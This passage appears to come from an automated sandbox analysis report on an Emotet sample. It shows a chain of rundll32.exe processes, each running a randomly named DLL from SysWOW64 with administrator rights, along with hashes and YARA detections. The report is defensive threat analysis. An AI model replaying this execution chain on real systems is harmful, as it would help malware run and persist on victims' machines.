                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2116722634.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2788 Parent PID: 1840

                                            General

                                            Start time:13:42:54
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2117982629.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2118123404.0000000000201000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 1428 Parent PID: 2788

                                            General

                                            Start time:13:42:55
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2119357685.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2119622142.0000000000221000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2840 Parent PID: 1428

                                            General

                                            Start time:13:42:55
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2340256128.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2340299348.0000000000231000.00000020.00000001.sdmp, Author: Joe Security

                                            Disassembly

                                            Code Analysis

                                            Reset < >